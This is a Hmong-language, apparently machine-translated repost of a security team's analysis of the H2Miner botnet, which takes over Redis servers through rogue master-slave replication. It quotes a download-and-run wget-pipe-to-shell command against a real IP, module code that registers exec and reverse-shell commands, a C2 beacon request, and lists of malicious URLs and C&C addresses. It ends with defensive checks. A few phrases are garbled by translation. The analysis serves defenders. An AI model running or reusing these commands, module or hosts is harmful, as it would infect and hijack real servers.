Ib hnub dhau los, ib qho ntawm kuv qhov project servers tau tawm tsam los ntawm tus kab mob zoo sib xws. Hauv kev tshawb nrhiav cov lus teb rau lo lus nug "dab tsi yog qhov ntawd?" Kuv pom ib tsab xov xwm zoo los ntawm pab pawg Alibaba Cloud Security. Txij li thaum kuv tsis pom tsab xov xwm no ntawm Habre, kuv txiav txim siab txhais nws tshwj xeeb rau koj <3
nkag
Tsis ntev los no, Alibaba Cloud pawg neeg saib xyuas kev ruaj ntseg tau tshawb pom qhov tshwm sim sai ntawm H2Miner. Hom kab phem no siv qhov tsis muaj kev tso cai lossis tsis muaj zog passwords rau Redis ua lub rooj vag rau koj lub cev, tom qab ntawd nws synchronizes nws tus kheej siab phem module nrog tus qhev los ntawm tus tswv- qhev synchronization thiab thaum kawg rub tawm qhov kev phem no mus rau lub tshuab tawm tsam thiab tua cov neeg phem. cov lus qhia.
Yav dhau los, kev tawm tsam ntawm koj lub tshuab feem ntau yog ua los ntawm kev siv cov txheej txheem uas tau teem sijhawm ua haujlwm lossis SSH yuam sij uas tau sau rau koj lub tshuab tom qab tus neeg tawm tsam nkag rau hauv Redis. Hmoov zoo, txoj kev no tsis tuaj yeem siv ntau zaus vim muaj teeb meem nrog kev tso cai tswj lossis vim muaj qhov sib txawv ntawm cov kab ke. Txawm li cas los xij, hom kev thauj khoom siab phem no tuaj yeem ua ncaj qha rau tus neeg tawm tsam cov lus txib lossis nkag mus rau lub plhaub, uas yog qhov txaus ntshai rau koj lub cev.
Vim muaj coob tus Redis servers tuav hauv Is Taws Nem (ze li 1 lab), Alibaba Cloud pab pawg kev ruaj ntseg, raws li kev ceeb toom tus phooj ywg, pom zoo kom cov neeg siv tsis txhob sib koom Redis online thiab tsis tu ncua xyuas lub zog ntawm lawv cov passwords thiab seb lawv puas raug cuam tshuam. ceev xaiv.
H2 Miner
H2Miner yog mining botnet rau Linux-based systems uas tuaj yeem cuam tshuam koj lub cev hauv ntau txoj hauv kev, suav nrog tsis muaj kev tso cai hauv Hadoop xov paj, Docker, thiab Redis tej thaj chaw deb hais kom ua tiav (RCE) qhov tsis zoo. Ib lub botnet ua haujlwm los ntawm rub tawm cov ntawv tsis zoo thiab malware rau kuv cov ntaub ntawv, nthuav tawm kev tawm tsam kab rov tav, thiab tswj hwm kev hais kom ua thiab tswj (C&C) kev sib txuas lus.
Redis RCE
Kev paub txog cov ntsiab lus no tau qhia los ntawm Pavel Toporkov ntawm ZeroNights 2018. Tom qab version 4.0, Redis txhawb nqa lub plug-in loading feature uas muab cov neeg siv lub peev xwm thauj khoom kom cov ntaub ntawv suav nrog C rau hauv Redis los ua cov lus txib tshwj xeeb Redis. Qhov kev ua haujlwm no, txawm hais tias muaj txiaj ntsig, muaj qhov tsis zoo uas, hauv hom qhev tus tswv, cov ntaub ntawv tuaj yeem synchronized nrog tus qhev ntawm fullresync hom. Qhov no tuaj yeem siv los ntawm tus neeg tawm tsam kom hloov cov ntaub ntawv tsis zoo. Tom qab kev hloov pauv tiav lawm, cov neeg tawm tsam thauj cov module mus rau qhov kev tawm tsam Redis piv txwv thiab ua txhua yam lus txib.
Malware Worm Analysis
Tsis ntev los no, Alibaba Cloud kev ruaj ntseg pab pawg tau tshawb pom tias qhov loj ntawm H2Miner cov neeg ua haujlwm siab phem tau nce sai heev. Raws li kev txheeb xyuas, cov txheej txheem dav dav ntawm kev tawm tsam tshwm sim yog raws li hauv qab no:
H2Miner siv RCE Redis rau kev tawm tsam tag nrho. Cov neeg tawm tsam thawj zaug tsis muaj kev tiv thaiv Redis servers lossis servers nrog cov password tsis muaj zog.
Tom qab ntawd lawv siv cov lus txib config set dbfilename red2.so hloov lub npe ntaub ntawv. Tom qab ntawd, cov neeg tawm tsam ua qhov kev hais kom ua slaveof los teeb tsa tus tswv- qhev replication host chaw nyob.
Thaum qhov kev tawm tsam Redis piv txwv tsim kev sib txuas nrog tus tswv- qhev nrog lub siab phem Redis uas yog tus tswv ntawm tus neeg tawm tsam, tus neeg tawm tsam xa cov kab mob uas siv cov lus txib fullresync los synchronize cov ntaub ntawv. Cov ntaub ntawv red2.so yuav ces muab rub mus rau lub tshuab ntaus. Cov neeg tawm tsam ces siv ./red2.so loading module los thauj cov ntaub ntawv no. Lub module tuaj yeem ua tiav cov lus txib los ntawm tus neeg tawm tsam lossis pib qhov kev sib txuas rov qab (rov qab) kom nkag mus rau lub tshuab tawm tsam.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Tom qab ua tiav cov lus txib phem xws li / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, tus neeg tawm tsam yuav rov pib dua lub npe ntawm cov ntaub ntawv thaub qab thiab tshem tawm qhov system module los ntxuav cov kab. Txawm li cas los xij, cov ntaub ntawv red2.so tseem yuav nyob hauv lub tshuab tawm tsam. Cov neeg siv tau raug qhia kom them sai sai rau qhov muaj xws li cov ntaub ntawv tsis txaus ntseeg hauv daim nplaub tshev ntawm lawv qhov Redis piv txwv.
Ntxiv nrog rau kev tua qee cov txheej txheem phem los nyiag cov peev txheej, tus neeg tawm tsam tau ua raws li tsab ntawv tsis zoo los ntawm rub tawm thiab tua cov ntaub ntawv tsis zoo binary rau . Qhov no txhais tau hais tias cov txheej txheem npe lossis cov npe ntawm cov npe uas muaj cov txheeb ze ntawm tus tswv tsev yuav qhia tau tias lub tshuab ntawd tau kis tus kab mob no.
Raws li cov txiaj ntsig rov qab engineering, malware feem ntau ua haujlwm hauv qab no:
- Uploading cov ntaub ntawv thiab ua lawv
- Tsuas yog
- Tuav C&C kev sib txuas lus thiab ua tiav cov lus txib tawm tsam
Siv masscan rau sab nraud scanning kom nthuav koj lub hwj chim. Tsis tas li ntawd, tus IP chaw nyob ntawm C&C server yog hard-coded nyob rau hauv qhov kev pab cuam, thiab tus tswv tsev tawm tsam yuav sib txuas lus nrog C&C kev sib txuas lus server siv HTTP thov, qhov twg cov zombie (kev cuam tshuam server) cov ntaub ntawv raug txheeb xyuas hauv HTTP header.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Lwm txoj kev tawm tsam
Chaw nyob thiab txuas siv los ntawm tus cab
/kwv tij
β’ 142.44.191.122/t.sh
β’ 185.92.74.42/h.sh
β’ 142.44.191.122/spr.sh
β’ 142.44.191.122/spre.sh
β’ 195.3.146.118/unk.sh
s&c
β’ 45.10.88.102
β’ 91.215.169.111
β’ 139.99.50.255
β’ 46.243.253.167
β’ 195.123.220.193
Ntsis
Ua ntej, Redis yuav tsum tsis txhob nkag tau los ntawm Is Taws Nem thiab yuav tsum tau tiv thaiv nrog tus password muaj zog. Nws tseem yog ib qho tseem ceeb uas cov neeg siv khoom xyuas tias tsis muaj red2.so cov ntaub ntawv hauv Redis phau ntawv qhia thiab tias tsis muaj "kinsing" hauv cov ntaub ntawv / txheej txheem npe ntawm tus tswv tsev.
Tau qhov twg los: www.hab.com